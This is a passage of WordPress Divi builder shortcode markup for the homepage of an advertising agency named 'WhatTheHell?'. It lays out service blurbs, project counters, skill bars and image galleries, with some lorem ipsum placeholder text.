header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>[/et_pb_text][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.9\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"zoom\" animation_duration=\"1200ms\" box_shadow_style=\"preset2\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Service Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"56px||110px|||\" custom_padding_tablet=\"20px||||false|false\" custom_padding_phone=\"12px||40px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.4.9\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU&t=5s\" image_src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-01.jpg\" _builder_version=\"4.4.9\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving real Problems</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"350\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"62\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"16\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"109px||110px|\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||40px|\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-07-1.png\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Why choose us?</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Always eager to work with people who are looking to do brilliant things to their brands.</span></p>\n<p> <span>We help in realizing brand aspirations through our in-depth research &amp; analytics and translate them into irreverent creative ideas. We always remember that there’s more to marketing communication than top-funnel awareness building through BTL, ATL, Outdoor, or Digital Media Publishing.</span></p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"110px||5px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-02.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-03.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-05.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-04.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"0px||90px|\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"3.22\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It is a long established fact that a reader. It was popularised in the 1960s with the release.\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#d4b068\" use_percentages=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]UX Research - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Interface Design - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"3.22\" background_color_gradient_direction=\"90deg\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/background-split-03-1.jpg\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" 